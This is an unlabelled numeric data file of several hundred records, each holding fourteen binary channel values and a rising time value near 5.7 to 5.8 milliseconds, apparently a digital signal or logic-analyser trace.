1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6753600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6753640e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6754120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6754360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6754600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6754840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6755360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6755600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6755640e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6755840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6756120e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,5.6756160e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6756200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6756360e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6756600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6756840e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6757080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6757160e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6757600e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6757880e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6757920e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6758120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6758360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6758600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6758840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6758920e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6759080e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6759320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6759400e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6759880e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6760120e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6760160e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6760360e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6760600e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6760840e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6761080e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,5.6761320e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,5.6761600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6761640e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6762120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6762360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6762600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6762840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6763080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6763320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6763600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6763840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6764120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6764360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6764600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6764840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6765080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6765320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6765600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6765840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6766120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6766360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6766600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6766840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6767080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6767320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6767600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6767840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6768120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6768360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6768600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6768840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6769080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6769320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6769600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6769840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6770120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6770320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6770600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6770840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6771080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6771320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6771600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6771840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6772120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6772360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6772600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6772840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6773080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6773320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6773600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6773840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6774120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6774360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6774600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6774840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6775080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6775320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6775600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6775840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6776120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6776360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6776600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6776840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6777080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6777320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6777600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6777840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6778120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6778360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6778600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6778840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6779080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6779320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6779600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6779840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6780120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6780360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6780600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6780840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6781080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6781320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6781600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6781840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6782120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6782360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6782600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6782840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6783080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6783320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6783600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6783840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6784120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6784360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6784600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6784840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6785080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6785320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6785600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6785840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6786120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6786360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6786600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6786840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6787080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6787320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6787600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6787840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6788120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6788360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6788600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6788840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6789080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6789320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6789600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6789840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6790120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6790360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6790600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6790840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6791080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6791320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6791600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6791840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6792120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6792360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6792600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6792840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6793080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6793320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6793600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6793840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6794120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6794360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6794600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6794840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,5.6795080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,5.6795320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,5.8039800e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,5.8041920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8042120e-03 0,0,1,1,1,0,0,0,0,0,0,1,0,1,5.8042440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8042680e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,5.8045680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8045920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,1,5.8045960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,1,5.8046440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,1,5.8046680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8046760e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,5.8046920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8047160e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,5.8047680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8047920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,5.8048200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,5.8048440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,1,5.8048480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8048760e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8048920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8049160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8049240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8049440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8049680e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8049720e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8050200e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8050440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8050520e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8050680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8050920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8051160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8051400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8051680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8051920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8052200e-03 0,0,1,1,1,0,0,0,0,1,0,0,0,0,5.8052440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8052480e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8052920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8053160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8053240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8053400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8053640e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8053720e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8054160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8054400e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8054680e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8054920e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,5.8054960e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8055000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8055160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8055400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8055640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8055880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8056160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8056400e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8056440e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8056920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8057160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8057240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8057400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8057640e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8057720e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8058160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8058400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8058480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8058680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8058920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8059160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8059400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8059640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8059880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8059960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8060160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8060400e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8060920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8061160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8061240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8061400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8061640e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8061880e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8062120e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8062400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8062640e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8062680e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8062920e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8063160e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8063400e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8063640e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8063880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8064120e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8064200e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8064680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8064920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8065160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8065400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8065680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8065880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8065960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8066400e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8066680e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,5.8066720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8066760e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8066920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8067160e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8067400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8067680e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8067880e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8068160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8068200e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8068400e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8068680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8068720e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8068920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8069160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8069200e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8069680e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8069880e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8070160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8070400e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,5.8070440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8070480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8070680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8070920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8071160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8071400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8071680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8071880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8071960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8072400e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8072680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8072720e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8072920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8073160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8073200e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8073680e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8073880e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8074000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8074160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8074400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8074680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8074920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8075160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8075400e-03 0,0,1,1,1,0,0,0,0,1,0,0,0,0,5.8075440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8075480e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8075880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8076160e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,5.8076200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8076240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8076400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8076640e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8076920e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8077160e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8077400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8077640e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8077720e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8078160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8078400e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8078480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8078680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8078920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8079160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8079400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8079640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8079880e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8079960e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,5.8080160e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,5.8080400e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,5.8080440e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8080480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8080680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8080920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8081160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8081400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8081640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8081880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8082160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8082400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8082680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8082920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8083160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8083400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8083640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8083880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8084160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8084400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8084680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8084920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8085160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8085400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8085640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8085880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8086160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8086400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8086680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8086920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8087160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8087400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8087640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8087880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8088160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8088400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8088680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8088920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8089160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8089400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8089640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8089880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8090160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8090400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8090680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8090920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8091160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8091400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8091640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8091880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8092160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8092400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8092680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8092920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8093160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8093400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8093640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8093880e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8094160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8094400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8094680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8094920e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8095160e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8095400e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,5.8095640e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,5.8095880e-03 